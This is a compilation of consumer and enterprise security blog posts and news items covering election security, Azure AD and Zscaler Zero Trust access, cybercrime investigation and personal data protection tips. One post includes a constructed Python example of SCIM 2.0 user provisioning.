The post Global WAN optimization market forecast to reach $1.4 billion by 2025 appeared first on Help Net Security.

2020 Voters: What You Need to Know About Election Security

Voters across the country are preparing to cast their ballot for the all-important 2020 U.S. presidential elections. Whether you’re a new voter eager for your voice to be heard or a parent looking to guide your family members on exercising their right to vote, consumers can be certain about one thing: election security should be top-of-mind for everyone as Election Day creeps closer. In addition to researching the presidential candidates and deciding who to support, consumers should also educate themselves on how to vote safely and securely.    

Heads Up, First-Time Voters

As a young or first-time voter, you are probably eager to have your voice finally heard. However, you should also be on high alert for digital disinformation campaigns. These scams seek to suppress or disrupt the voting process by setting up bogus websites with official-sounding domains and related email addresses. From there, hackers could use those bogus email addresses to send mass email blasts intended to feed unsuspecting voter email recipients false information on when, where, and how to vote.   

According to recent McAfee survey results, the majority of election administration websites for “tossup” states lacked both official U.S. government .GOV validation, which confirms that a site belongs to a government entity, and HTTPS, which encrypts traffic and authenticates the server. Together these make it much harder for attackers to pass off look-alike sites as legitimate county government sites. Before Americans cast that incredibly important ballot, they should confirm that the site they are visiting is a .GOV website and that HTTPS protection is in place.

Help Protect Your Family’s Vote

Whether it’s who you’re voting for or what you think of party policy, it’s incredibly important that every voice is heard in 2020. As people across the country make their decision, you must discuss the implications of digital disinformation and illegitimate voting websites with your family. Failing to discuss these attacks with new or young voters could mean the difference between whether or not their voice is heard in the 2020 election. Consumers must take action to ensure they are staying informed on possible hacks like this and sharing it with their loved ones to ensure no voices are left unheard this year.  

How to Stay Protected

Whether it’s your first or fifteenth time heading to the polls, we must all take action to ensure we’re staying informed on possible hacks, minimizing risk and not leaving this vote to chance. As you or your loved ones prepare to cast your ballots, consider these tips to help ensure that your vote is protected:   

Look out for suspicious emails

Carefully scrutinize all election-related emails. An attacker seeking to misinform consumers can use phishing techniques to accomplish their objective. Beware of election emails from non-.gov addresses such as .com, .net, .org, or .us, particularly any emails sent in the final days before Election Day. 

Question conflicting instructions

Question any voting instructions that appear to conflict with other guidance you’ve received from traditional sources such as the U.S. Postal Service, the primary channel state and local governments use to send out voting information.  

Refer to your official State website

When in doubt, visit your state’s elections website to receive general election information on voter registration and contact information for your county’s election officials. Contact the local county officials to confirm any election instructions you receive via email, social media, or websites leading up to Election Day. Voters can find the official state election websites here 

Confirm local instructions locally

Call your county or city government officials directly to confirm any last-minute voting instruction changes to the regional or local Election Day procedures. 

Ask for .gov and https on websites

Ask your county officials to use .gov validation and https protection on any government websites involved in elections. The .gov in a website name validates that the U.S. government has certified that the website truly belongs to the government entity it claims. The https indicates that information you share with the website is encrypted in transit and that your browser has verified it is talking to the site named in the address bar, so it cannot be silently read or altered on the way. It does not by itself prove the site is the genuine government site; that is what the .gov check is for.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 2020 Voters: What You Need to Know About Election Security appeared first on McAfee Blogs.

4 identity partnerships to help drive better security

At Microsoft, we are committed to driving innovation for our partnerships within the identity ecosystem. Together, we are enabling our customers, who live and work in a heterogeneous world, to get secure and remote access to the apps and resources they need. In this blog, we’d like to highlight how partners can help enable secure remote access to any app, access to on-prem and legacy apps, as well as how to secure seamless access via passwordless apps. We will also touch on how you can increase security visibility and insights by leveraging Azure Active Directory (Azure AD) Identity Protection APIs.

Secure remote access to cloud apps

As organizations adopt remote work strategies in today’s environment, it’s important their workforce has access to all the applications they need. With the Azure AD app gallery, we work closely with independent software vendors (ISVs) to make it easy for organizations and their employees and customers to connect to and protect the applications they use. The Azure AD app gallery consists of thousands of applications that make it easy for admins to set up single sign-on (SSO) or user provisioning for their employees and customers. You can find popular collaboration applications to work remotely, such as Cisco Webex, Zoom, and Workplace from Facebook, or security-focused applications such as Mimecast and Jamf. And if you don’t find the application your organization needs, you can always make a nomination here.

The Azure AD Gallery.

Secure hybrid access to your on-premises and legacy apps

As organizations enable their employees to work from home, maintaining remote access to all company apps, including those on-premises and legacy, from any location and any device, is key to safeguard the productivity of their workforce. Azure AD offers several integrations for securing on-premises SaaS applications like SAP NetWeaver, SAP Fiori systems, Oracle PeopleSoft and E-Business Suite, and Atlassian JIRA and Confluence through the Azure AD App Gallery. For customers who are using Akamai Enterprise Application Access (EAA), Citrix Application Delivery Controller (ADC), F5 BIG-IP Access Policy Manager (APM), or Zscaler Private Access (ZPA), Microsoft has partnerships to provide remote access securely and help extend policies and controls that allow businesses to manage and govern on-premises legacy apps from Azure AD without having to change how the apps work.

Our integration with Zscaler allows a company’s business partners, such as suppliers and vendors, to securely access legacy, on-premises applications through the Zscaler B2B portal.

Integration with Zscaler

Go passwordless with FIDO2 security keys

Passwordless methods of authentication should be part of everyone’s future. Currently, Microsoft has over 100 million active passwordless end-users across consumer and enterprise customers. These passwordless options include Windows Hello for Business, the Authenticator app, and FIDO2 security keys. Why are passwords falling out of favor? For them to be effective, passwords must have several characteristics, including being unique to every site. Trying to remember them all can frustrate end-users and lead to poor password hygiene.

Since Microsoft announced the public preview of Azure AD support for FIDO2 security keys in hybrid environments earlier this year, I’ve seen more organizations, especially with regulatory requirements, start to adopt FIDO2 security keys. This is another important area where we’ve worked with many FIDO2 security key partners who are helping our customers to go passwordless smoothly.

Partner logos

Increase security visibility and insights by leveraging Azure AD Identity Protection APIs

We know from our partners that they would like to leverage insights from Azure AD Identity Protection with their security tools such as security information and event management (SIEM) or network security. The end goal is to help them leverage all the security tools they have in an integrated way. Currently, we have the Azure AD Identity Protection API in preview that our ISVs leverage. For example, RSA announced at their 2020 conference that they are now leveraging our signals to better defend their customers.

We’re looking forward to working with many partners to complete these integrations.

If you haven’t taken advantage of any of these types of solutions, I recommend you try them out today and let us know what you think. If you have product partnership ideas with Azure AD, feel free to connect with me via LinkedIn or Twitter.

The post 4 identity partnerships to help drive better security appeared first on Microsoft Security.

The Process of Investigating Cyber Crimes

Cybercrime is any criminal activity in which a computer or network device is the target and/or the tool. Some cybercrimes directly attack computers or other devices to disable them. In others, cybercriminals use computers for their own purposes: to distribute malicious code, obtain information illegally, or obtain cryptocurrency. Dividing cybercrimes into separate categories is not easy, as there are many of them. That’s why students often ask for professional help from a paper writing service when they need to write about cybercrimes.

Hacker attacks long ago ceased to be the intellectual pastime of sophisticated lone IT enthusiasts. Today there are many specialists who perform various types of cyberattacks. The cyberattack itself is only a means of achieving a certain goal. In such a situation, economic and political goals prevail: money and power are powerful incentives for resorting to cybercrime methods. Therefore, organizations with developed online businesses that actively use electronic payment systems, as well as the network resources of political parties and movements, are the first targets of cybercriminals of varying levels of skill. The foregoing does not exclude one-off actions by individuals, or their own criminal businesses, which can adversely affect any of us.

How Do Cybercriminals Commit Their Crimes?

These are the four most common ways in which cybercriminals take advantage of the Internet.

  • The first one, which many people fear, is the use of malware. You probably understand that there are many methods of compromising critical systems, and how important it is to use various security measures, for example, setting long passwords and applying regular updates. This type of attack is based on the abuse of computers, DNS servers, networks, domains and subdomains. Take into account that Windows is more vulnerable than a Linux system.
  • The second way is DDoS attacks, in which an attacker uses a communication network protocol to create a huge number of requests to a server or service. In this type of attack, the main goal is to disable the target.
  • The third way is a combination of social engineering and malicious code. The most famous form of this type of attack is phishing, in which a victim is tricked into taking certain actions (clicking on a link in an email or image, visiting a site, etc.), which subsequently leads to infection of the system using the first method.
  • The fourth way is illegal activity: harassment, the recording and distribution of illegal content, grooming, etc. In this case, the attackers hide their traces through anonymous profiles, encrypted messages, and other similar technologies.

What Are the Steps of Cyber Crime Investigation?

At the very beginning, law enforcement officials should assess the current situation with the goal of clearly understanding what happened, what information was accessed illegally, and what solid facts can prove signs of illegal activity. Officials need technical evidence and legal grounds to have the right to collect a sufficient amount of information. At the next stage, a decision can be made to initiate a criminal case. Other qualified experts will then investigate it with the support of specialists in computer-technical research and cybersecurity. In order for a court to pronounce a sentence on the basis of the current criminal procedure legislation, the authorities must take certain steps. Here is what they are:

  • Find solid evidence that the crime took place and determine when, where, and how exactly it was committed;
  • Find those who are guilty of the crime and provide solid arguments proving the guilt of one person or a group of people;
  • Define the circumstances that can prove the identity of the guilty person;
  • Determine the negative consequences of the crime that took place;
  • Find out what factors led to the crime.

Today, one can find a good private agency that will carry out all the steps listed above.

Why Is the Computer-Technical Expertise a Must?

The purpose of computer-technical expertise is to determine the digital traces that can be connected with certain people. Another goal is to evaluate how these traces fit a definite situation and to select the activities that are significant in terms of forensic cases. It’s necessary to identify what traces can serve as the foundation of the investigation. A vital issue is presenting the results of the study so that even a specialist without solid IT knowledge has a clear understanding of the situation. These are the lawyers, judges, and all the other specialists who are involved in the legal proceedings.

Generally accepted models of digital data analysis for judicial purposes:

  • A model that provides maximum speed of digital data processing and focuses on solving typical (standard) tasks;
  • An individual, “thorough” approach focused on rare or simply unique tasks.

The first uses professional digital equipment and specialized expert programs such as EnCase, but practically does not allow taking into account the individual techniques used to prepare and commit a given cybercrime. The individual approach model, on the contrary, takes into account all the individual characteristics mentioned above, since the expert selects the specialized programs and the examination methodology based on the informational and technological patterns of the particular crime known to him/her. In general, one can say that this method makes it possible to find rare, unusual traces in the information environment that may be used as evidence in a criminal case.

The post The Process of Investigating Cyber Crimes appeared first on .

Solving the security challenges of remote working

Unprecedented times call for unprecedented actions and the ongoing COVID-19 pandemic has caused what is likely to be the biggest shift towards remote working that the world has ever seen. But, while the technology has been around for quite some time, recent events demonstrate just how few businesses are capable of switching from an office-based setup to a remote one in a fast, secure, and non-disruptive manner. There’s a significant number of reasons why it … More

The post Solving the security challenges of remote working appeared first on Help Net Security.

Computer science student discovers privacy flaws in security and doorbell cameras

Ring, Nest, SimpliSafe and eight other manufacturers of internet-connected doorbell and security cameras have been alerted to systemic design flaws discovered by Florida Tech computer science student Blake Janes that allow a shared account that appears to have been removed to actually remain in place with continued access to the video feed. Privacy flaws in security and doorbell cameras Janes discovered the mechanism for removing user accounts does not work as intended on many camera … More

The post Computer science student discovers privacy flaws in security and doorbell cameras appeared first on Help Net Security.

External attacks on cloud accounts grew 630 percent from January to April

The McAfee report uncovers a correlation between the increased use of cloud services and collaboration tools, such as Cisco WebEx, Zoom, Microsoft Teams and Slack during the COVID-19 pandemic, along with an increase in cyber attacks targeting the cloud. There are significant and potentially long-lasting trends that include an increase in the use of cloud services, access from unmanaged devices and the rise of cloud-native threats. These trends emphasize the need for new security delivery … More

The post External attacks on cloud accounts grew 630 percent from January to April appeared first on Help Net Security.

C-suite execs often pressure IT teams to make security exceptions for them

The C-suite is the most likely group within an organization to ask for relaxed mobile security protocols (74%) – despite also being highly targeted by malicious cyberattacks, according to MobileIron. The study combined research from 300 enterprise IT decision makers across Benelux, France, Germany, the U.K. and the U.S., as well as 50 C-level executives from both the U.K. and the U.S. The study revealed that C-level executives feel frustrated by mobile security protocols and … More

The post C-suite execs often pressure IT teams to make security exceptions for them appeared first on Help Net Security.

Operators rethinking security while making rapid progress toward 5G

Mobile service providers say they are making substantial progress toward ushering in a new generation of 5G networks that will enable ultra-high-speed mobile connectivity and a wide variety of new applications and smart infrastructure use cases. Progress includes steady work toward virtualizing core network functions and a reexamination of the security investments they will need to protect their networks and customers. COVID-19 is not expected to significantly delay the progress of 5G deployments, according to … More

The post Operators rethinking security while making rapid progress toward 5G appeared first on Help Net Security.

What’s trending on the underground market?

Trust has eroded among criminal interactions, causing a switch to e-commerce platforms and communication using Discord, which both increase user anonymization, Trend Micro reveals. Popular underground goods and services The report reveals that determined efforts by law enforcement appear to be having an impact on the cybercrime underground. Several forums have been taken down by global police entities, and remaining forums experience persistent DDoS attacks and log-in problems impacting their usefulness. Loss of trust led … More

The post What’s trending on the underground market? appeared first on Help Net Security.

How to Secure Your Personal Data While Online?

Even if you have absolutely nothing to hide, you still have to protect the privacy of your data. Increasingly, our whole life fits into a series of small data records that are sold on the internet. Think carefully before allowing any application to access your contact list or friend profiles. So, monitoring your online activity is important to protect not only information about yourself but also your own identity and the security of your loved ones.

For example, there is a program that will help protect your identity on the internet, IDShield. Here, you can read everything you need to know about IDShield in 2020. Note that many antiviruses, apart from protecting against malware, offer their own services for password security, tracking privacy settings, etc. If you are really worried about your personal data safety, then there is a reason to purchase such software.

Where to Start?

How do you protect your data? A large number of laptop, tablet and smartphone owners are confident that installing an antivirus program secures their devices. But does antivirus give full protection against hackers, or should you rely only on your own caution by minimizing the spread of personal information on the internet? Here, we will discuss how your personal data can leak and what to do to prevent it.

Antivirus is necessary for any computer connected to the internet. Moreover, modern antivirus programs are quite capable software, which also addresses the problem of protecting the user’s personal data on the internet. Modern developers offer a choice of several effective antiviruses, and some of them are free. Even free programs or demo versions of antiviruses that are updated every month are quite suitable.

So, start with looking for a good antivirus solution, which often includes a set of identity protection features and secures your online activity.

What Do Hackers Usually Look For?

It’s clear why hackers target the accounts of media personalities: information about their personal lives can potentially be worth a lot of money. But why hack the profile of an ordinary person? They have a lot of reasons.

Hackers are interested in the following:

  • Access to your credit cards;
  • Passwords from social networks are used for sending spam;
  • Access to your personal contact information allows them to profit by selling it to newsletters and advertising services;
  • Passwords from your accounts in games allow them to resell them to third parties or demand money from you to return your account;
  • With access to your profile on mobile devices, they collect your personal information and sell it to third parties or demand money for the return of a stolen profile.

In these and many other situations, you can prevent the negative outcome with thoughtful protection of personal data on the internet.

Take Care of Your Passwords

The easiest answer to the question of how to protect your data on the internet is to create a complex, difficult-to-guess password for your accounts and mailboxes. Here are a few rules that will help you protect your account from hacking:

  • Do not build a password from personal data that is publicly available, such as your last name, first name, date of birth, city, or the names of your children or spouse.
  • Be sure to add not only lowercase and uppercase letters to the password but also numbers or other characters.
  • Do not store the password on the computer in a file, on a sticker glued to the monitor, or on a sheet of paper hidden under the keyboard. Attackers are well aware of all these places and will check them first.
  • Try to use two-factor authentication, in which to enter your account, you must enter the secret code sent by the system to your phone.

Social Media Privacy

Another rule that should never be neglected by anyone wondering how to protect their personal data is the security of their social networks. Safe behavior there is not difficult. The main thing is to follow a few simple rules:

  • Be careful not to share private details of your life on social networks through private messages, and even more so in photos, even with loved ones. Remember that many dating sites do not guarantee user data safety, and dishonest people can get hold of it.
  • Check your profile’s privacy settings. For example, on Facebook, you can look at your page through an outside visitor’s eyes.
  • Do not save passwords to social media, even on your own computer and especially on other people’s devices if you use them to access the internet. Take the trouble to enter the password again each time.
  • Try to select different passwords for accounts on various social media.


The post How to Secure Your Personal Data While Online? appeared first on .

Can your mobile phone be hacked by implanting bugs in Android?

If you’re among the many who own an Android phone, you must have by now downloaded the popular operating system’s latest security update (released on 5th May) by Google. The update fixes multiple vulnerabilities within the OS including CVE-2020-0103 which is the severest. This vulnerability could potentially allow remote code…

Creating an emergency ready cybersecurity program

A large part of the world’s workforce has transitioned to working remotely, but as plans are being drawn up to reopen economies, the security industry is being challenged to develop stronger screening practices, emergency operations planning, and to deploy tools to detect and minimize the impact that future pandemics, natural disasters and cyberattacks can have on a company. Things like global security operation centers (SOCs), managed security services, thermal imaging and temperature screening for on-site … More

The post Creating an emergency ready cybersecurity program appeared first on Help Net Security.

Maintaining the SOC in the age of limited resources

With COVID-19, a variety of new cyber risks have made their way into organizations as a result of remote working and increasingly sophisticated, opportunistic threats. As such, efficiency in the security operations center (SOC) is more critical than ever, as organizations have to deal with limited SOC resources. Limited SOC resources The SOC is a centralized team of analysts, engineers, and incident managers who are responsible for detecting, analyzing, and responding to incidents and keeping … More

The post Maintaining the SOC in the age of limited resources appeared first on Help Net Security.

23% of leading banks had an exposed database with potential data leakage

Reposify unveiled research findings of critical asset exposures and vulnerabilities in attack surfaces of the world’s leading multinational banks. Researchers measured the prevalence of exposed sensitive assets including exposed databases, remote login services, development tools and additional assets for 25 multinational banks and their 350+ subsidiaries. Banks deal with exposed database threat 23% of banks had at least one misconfigured database exposed to the internet resulting in potential data leakage issues 54% of the banks … More

The post 23% of leading banks had an exposed database with potential data leakage appeared first on Help Net Security.

GDPR enforcement over the past two years

Two years after the GDPR went into effect, official data show that Data Protection Authorities (DPAs), crippled by a lack of resources, tight budgets, and administrative hurdles, have not yet been able to create adequate GDPR enforcement. Worse, some public authorities have grossly misused the GDPR to undermine other fundamental rights such as the right to free expression and freedom of the press, Access Now reveals. The GDPR’s first two years have been marked by … More

The post GDPR enforcement over the past two years appeared first on Help Net Security.

Cool and Helpful McAfee Tech to Help Secure Your Online Life

These days, we’re all actively engaging online. Whether it’s my kids scrolling through social media, my wife video chatting with her friends and online shopping, or me checking my emails, we’re all leveraging the devices in front of us to keep our lives moving forward.

What many people don’t realize is that there are technologies that we can implement into our daily online routines that will not only help us achieve our digital tasks more effectively but safeguard our privacy as well. If there’s a way I can browse the internet more quickly and securely than before, I’m here for it!  

Tools Anyone Can Use

There are a lot of free and easy-to-use technologies out there that can benefit you – you just need to learn what they are first! With that, let’s explore cool technologies that not too many people may know about, which can positively impact your online life.  

Safe Browsing Solutions

The internet is a vast sea of content, both good and bad. And we’re all navigating that sea to learn, work, and socialize online. But when you’re trying to browse as efficiently as possible, it can be tricky to tell the safe websites from the suspicious ones. That’s where a security solution like McAfee® WebAdvisor comes in to play.  

McAfee® WebAdvisor can help keep you safe from online threats like malware and phishing attempts while you surf the web. For example, the tool places a checkmark next to all the safe links, making security decisions much easier for the everyday internet user, like my wife when she’s on a mission to shop online. And it is free too! 

Virtual Private Network (VPN)

Even the average internet surfer like you and me should consider using a Virtual Private Network (VPN), as it essentially allows you to send and receive data across a public network as if it were a private network. A VPN encrypts, or scrambles, your information so others can’t read it, helping to safeguard your data. VPNs are especially handy when you are working remotely, if you want full access to the internet while you’re traveling, or if you simply want to protect your privacy. McAfee® Safe Connect is a great and affordable option (with a limited free version available too) for users who are looking for a solution that is not only easy to implement, but one that also provides bank-grade encryption and private browsing to protect all online activities.

Password Managers

Speaking of pesky passwords, another way to easily secure your online accounts is with a password manager. A password manager can help you create strong passwords, remove the hassle of remembering numerous passwords, and log you on to websites automatically. Who says staying secure has to be complicated? 

While many password managers are free, it’s important users do their research and adopt password managers from companies they trust. Another option? Some password managers also come included in a comprehensive security solution, like McAfee® Total Protection.

Robocall Blocking Apps

At one time or another, you’ve probably experienced a mysterious phone call from an “Unknown Caller.” If you’ve ever actually bothered to pick up one of these calls, you’ve likely heard a strange, robotic voice on the other end claiming to be from a certain organization or asking you to take action. Whether the call itself is just annoying or is coming from a criminal looking to scam consumers out of cash or information, one thing is certain – robocalls are a huge headache.  

Unfortunately, these pesky phone calls have shown no signs of slowing down. In fact, it was recently reported that robocall scams surged to 85 million globally, up 325% from 2017. Luckily there are multiple robocall blocking apps and tools users can adopt to avoid phone spam. Additionally, you can register on the FCC’s National Do Not Call list for added protection. 

Multi-Factor Authentication

If you read my previous blog, you know that many of the common password habits that we use can lead to multiple security concerns. That said, passwords are just the first line of defense when it comes to securing online accounts – so what happens if a hacker makes it through that security barrier? Enter two-factor or multi-factor authentication.  

These days, most people have heard of two-factor authentication. To put it simply, the tech utilizes two checkpoints to verify the user’s identity. These could be answers to security questions, a one-time password texted to your smartphone, a fingerprint scan, or facial recognition. While two-factor authentication is a great starting point, there’s also multi-factor authentication – which, as it sounds, means a user must address multiple types of proof points before gaining access to an account or device. In fact, multi-factor authentication is becoming more and more intuitive thanks to artificial intelligence, as it can select a combination of authentication factors based on a user’s risk profile and habits.  

This technology is easy to integrate into your life, as it’s often a simple add-on to a lot of the things we already own. For example, you can activate face-ID on your iOS phone or fingerprint on your Android phone and boom, you’ve got two-factor authentication! 

Tools for Current McAfee Subscribers

Are you currently subscribed to McAfee® Total Protection or McAfee® LiveSafe? If so, there might be some cool tools within these solutions that you aren’t taking full advantage of that can help boost your security and improve your online experience. The more you know, right? 

For example, if you are a current McAfee® LiveSafe subscriber, you automatically have access to McAfee’s secure VPN and McAfee File Lock. If you are currently subscribed to McAfee® Total Protection, you have access to a whole host of security tools including a password manager and VPN. Additionally, McAfee® Total Protection gives you access to McAfee® Identity Theft Protection, which is a great tool for monitoring fraud. Finally, if you’re looking to delete some sensitive files, you can use McAfee® Shredder™ to completely ensure that no traces are left behind. By employing the full range of these tools, current McAfee subscribers can take their security to the next level and surf the internet without missing a beat.

Cool Tech, Stronger Security

By taking advantage of these free, existing, and easily accessible tools, you can both improve every facet of your online life – whether that means social interactions, online shopping, or sending emails – and keep your information secure. You can have fun online and easily integrate security into your day-to-day which, in my opinion, is a win-win.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post Cool and Helpful McAfee Tech to Help Secure Your Online Life appeared first on McAfee Blogs.

Durham College to participate in siberXchange Live summit

Durham College, a partner and sponsor of SiberX, is participating in the siberXchange Live Summit this week to showcase new opportunities in autonomous vehicle and cybersecurity research. 

Zero Trust and its role in securing the new normal

As the global crisis around COVID-19 continues, security teams have been forced to adapt to a rapidly evolving security landscape. Schools, businesses, and healthcare organizations are all getting work done from home on a variety of devices and locations, extending the potential security attack surface.

While we continue to help our customers enable secure access to apps in this “new normal,” we’re also thinking about the road ahead and how there are still many organizations who will need to adapt their security model to support work life. This is especially important given that bad actors are using network access solutions like VPN as a trojan horse to deploy ransomware, and the number of COVID-19 themed attacks has increased and evolved.

Microsoft and Zscaler have partnered to provide a glimpse into how security will change in a post-COVID-19 world.

Accelerating to Zero Trust

“We’ve seen two years’ worth of digital transformation in two months.”
—Satya Nadella, CEO, Microsoft

With the bulk of end users now working remotely, organizations were forced to consider alternate ways of achieving modern security controls. Legacy network architectures that route all remote traffic through a central corporate datacenter are suddenly under enormous strain due to massive demand for remote work and rigid appliance capacity limitations. This creates latency for users, impacts productivity, and requires additional appliances that can take 30, 60, or even 90 days just to be shipped out.

To avoid these challenges many organizations were able to enable work from home by transitioning their existing network infrastructure and capabilities with a Zero Trust security framework instead.

The Zero Trust framework empowers organizations to limit access to specific apps and resources only to the authorized users who are allowed to access them. The integrations between Microsoft Azure Active Directory (Azure AD) and Zscaler Private Access embody this framework.

For the companies who already had a proof of concept underway for their Zero Trust journey, COVID-19 served as an accelerator, moving up the timelines for adoption. The ability to separate application access from network access, and to secure application access based on identity and user context, such as date/time, geolocation, and device posture, was critical for IT’s ability to enable remote work. Cloud-delivered technologies such as Azure AD and Zscaler Private Access (ZPA) have helped ensure fast deployment, scalability, and seamless experiences for remote users.

Both Microsoft and Zscaler anticipate that organizations already moving toward a Zero Trust model will accelerate that transition, and that those not yet moving will start to adopt one.

Securing flexible work going forward

While some organizations have had to support remote workers in the past, many are now forced to make the shift from a technical and cultural standpoint. As social distancing restrictions start to loosen, instead of remote everything we’ll begin to see organizations adopt more flexible work arrangements for their employees. Regardless of where employees are, they’ll need to be able to securely access any application, including the mission-critical “crown jewel” apps that may still run on-premises and use legacy authentication protocols like HTTP or LDAP. To simplify protecting access to apps under a now flexible working style, there should be a single policy per user that grants access to an application, whether they are remote or at the headquarters.

Zscaler Private Access and Azure AD help organizations enable single sign-on and enforce Conditional Access policies to ensure authorized users can securely access specifically the apps they need. This includes their mission-critical applications that run on-premises and may have SOC 2 and ISO 27001 compliance needs.

Today, the combination of ZPA and Azure AD is already helping organizations adopt flexible work arrangements and ensure seamless and secure access to their applications.

Secure access with Zscaler and Microsoft

Remote onboarding or offboarding for a distributed workforce

With remote and flexible work arrangements becoming the norm, organizations will need to consider how best to onboard or offboard a distributed workforce and ensure the right access can be granted when employees join, change, or leave roles. To minimize disruption, organizations will need to enable and secure bring your own device (BYOD) or leverage solutions like Windows Autopilot that can help users set up new devices without any IT involvement.

To ensure employees can access applications on day one, automating the provisioning of user accounts to applications will be critical for productivity. The SCIM 2.0 standard, adopted by both Microsoft and Zscaler, can help automate simple actions, such as creating or updating users, adding users to groups, or deprovisioning users from applications. Azure AD user provisioning can help manage the end-to-end identity lifecycle and automate policy-based provisioning and deprovisioning of user accounts for applications. The ZPA + Azure AD SCIM 2.0 configuration guide shows how this works.
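To make the SCIM 2.0 lifecycle concrete, here is an added example (not code from Microsoft, Zscaler, or the configuration guide the post refers to) of an application-side SCIM store that handles the three actions named above: creating a user, adding the user to a group, and deprovisioning. The store, the group name, the user name, and the request payloads are constructed; the request shapes follow the SCIM 2.0 core schema and PatchOp message formats from RFC 7643 and RFC 7644.

```python
"""Minimal SCIM 2.0 identity lifecycle (join, group assignment, leave) on an in-memory
store. Constructed example: the store and payloads are invented; the resource shapes
follow the SCIM 2.0 core schema and PatchOp message (RFC 7643 / RFC 7644), not a vendor."""
import uuid

USER_SCHEMA = "urn:ietf:params:scim:schemas:core:2.0:User"
GROUP_SCHEMA = "urn:ietf:params:scim:schemas:core:2.0:Group"
PATCH_SCHEMA = "urn:ietf:params:scim:api:messages:2.0:PatchOp"


class ScimError(Exception):
    """Malformed or conflicting request; a real endpoint answers HTTP 400/404/409."""


def _require_schema(body, schema):
    if schema not in body.get("schemas", []):
        raise ScimError(f"request lacks schema {schema}")


class ScimStore:
    """Stands in for the application side of a SCIM endpoint (/Users and /Groups)."""

    def __init__(self):
        self.users, self.groups = {}, {}

    def create_user(self, body):
        """POST /Users: the identity provider pushes a new joiner on day one."""
        _require_schema(body, USER_SCHEMA)
        name = body.get("userName")
        if not name or any(u["userName"].lower() == name.lower() for u in self.users.values()):
            raise ScimError("userName missing or already taken")  # taken -> HTTP 409
        user = {"schemas": [USER_SCHEMA], "id": str(uuid.uuid4()),
                "userName": name, "active": bool(body.get("active", True))}
        self.users[user["id"]] = user
        return user

    def create_group(self, display_name):
        """POST /Groups: one group per application segment, initially empty."""
        group = {"schemas": [GROUP_SCHEMA], "id": str(uuid.uuid4()),
                 "displayName": display_name, "members": []}
        self.groups[group["id"]] = group
        return group

    def patch_user(self, user_id, body):
        """PATCH /Users/{id}: here only 'replace active', the deactivation step."""
        _require_schema(body, PATCH_SCHEMA)
        user = self.users[user_id]  # KeyError stands in for HTTP 404
        for op in body.get("Operations", []):
            if op.get("op", "").lower() != "replace" or op.get("path") != "active":
                raise ScimError(f"unsupported operation: {op}")
            user["active"] = bool(op["value"])
        return user

    def patch_group(self, group_id, body):
        """PATCH /Groups/{id}: add or remove members (User.groups itself is read-only)."""
        _require_schema(body, PATCH_SCHEMA)
        group = self.groups[group_id]  # KeyError stands in for HTTP 404
        for op in body.get("Operations", []):
            kind, path = op.get("op", "").lower(), op.get("path")
            if path != "members" or kind not in ("add", "remove"):
                raise ScimError(f"unsupported operation: {op}")
            ids = {m["value"] for m in op.get("value", [])}
            if not ids <= set(self.users):
                raise ScimError("member refers to an unknown user")
            current = {m["value"] for m in group["members"]}
            current = current | ids if kind == "add" else current - ids
            group["members"] = [{"value": i} for i in sorted(current)]
        return group

    def delete_user(self, user_id):
        """DELETE /Users/{id}: final removal; also drop now-orphaned group memberships."""
        if self.users.pop(user_id, None) is None:
            raise ScimError("no such user")
        for group in self.groups.values():
            group["members"] = [m for m in group["members"] if m["value"] != user_id]
        return True

    def effective_access(self, user_name):
        """Groups that grant access right now: a deactivated account grants none."""
        user = next((u for u in self.users.values() if u["userName"] == user_name), None)
        if user is None or not user["active"]:
            return []
        return sorted(g["displayName"] for g in self.groups.values()
                      if any(m["value"] == user["id"] for m in g["members"]))


def run_lifecycle():
    """Walk one constructed employee through join, group assignment and leave."""
    store = ScimStore()
    apps = store.create_group("zpa-finance-apps")
    alice = store.create_user({"schemas": [USER_SCHEMA], "userName": "alice@example.test"})
    store.patch_group(apps["id"], {"schemas": [PATCH_SCHEMA], "Operations": [
        {"op": "add", "path": "members", "value": [{"value": alice["id"]}]}]})
    joined = store.effective_access("alice@example.test")
    store.patch_user(alice["id"], {"schemas": [PATCH_SCHEMA], "Operations": [
        {"op": "replace", "path": "active", "value": False}]})  # leaver: deactivate first
    deactivated = store.effective_access("alice@example.test")
    store.delete_user(alice["id"])  # then remove the record
    return {"joined": joined, "deactivated": deactivated,
            "members_after_delete": len(apps["members"])}
```

The ordering is the point: effective_access() returns nothing as soon as active is replaced with false, before the DELETE, so access stops the moment the identity provider flags the leaver, and delete_user() strips the orphaned group membership so a group cannot keep granting access to a record that no longer exists.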

Powering security going forward

Security and IT teams are already under strain in this new environment, and adding an impending economic downturn into the equation means they’ll need to do more with less. The responsibility of selecting the right technology falls to security leaders. Together, Microsoft and Zscaler can help deliver secure access to applications and data on all the devices accessing your network, while empowering employees with simpler, more productive experiences. This is the power of the cloud and some of the industry’s deepest levels of integration. We look forward to working with you on what your security might look like after COVID-19.

Stay safe.

For more information on Microsoft Zero Trust, visit our website: Zero Trust security framework. Learn more about our guidance related to COVID-19 here and bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Zero Trust and its role in securing the new normal appeared first on Microsoft Security.

Why building backdoors into encryption won’t make us safer

For much of the last decade, technology companies have been in an uphill battle to save encryption, a battle that has seen an increasing number of skirmishes that tech companies often lose. Throughout this ongoing clash, governments across the world have been pushing to backdoor encryption in the name of combating child abuse and terrorism. The battle has come to a head several times in recent years, including when the FBI demanded Apple assist in … More

The post Why building backdoors into encryption won’t make us safer appeared first on Help Net Security.

How do I select a backup solution for my business?

42% of companies experienced a data loss event that resulted in downtime last year. That high number is likely caused by the fact that while nearly 90% are backing up the IT components they’re responsible for protecting, only 41% back up daily – leaving many businesses with gaps in the valuable data available for recovery. In order to select an appropriate backup solution for your business, you need to think about a variety of factors. … More

The post How do I select a backup solution for my business? appeared first on Help Net Security.

What hinders successful threat hunting?

As more organizations implement successful threat hunting operations, a SANS Institute survey finds that they are facing common challenges with employing skilled staff and collecting quality threat intelligence. “Without a sufficient number of skilled staff, high-quality intelligence, and the right tools to get visibility into the infrastructure, success with threat hunting will remain limited,” says survey author Mathias Fuchs. “A world where we’ll see a unified, widely accepted golden standard of threat hunting remains in … More

The post What hinders successful threat hunting? appeared first on Help Net Security.

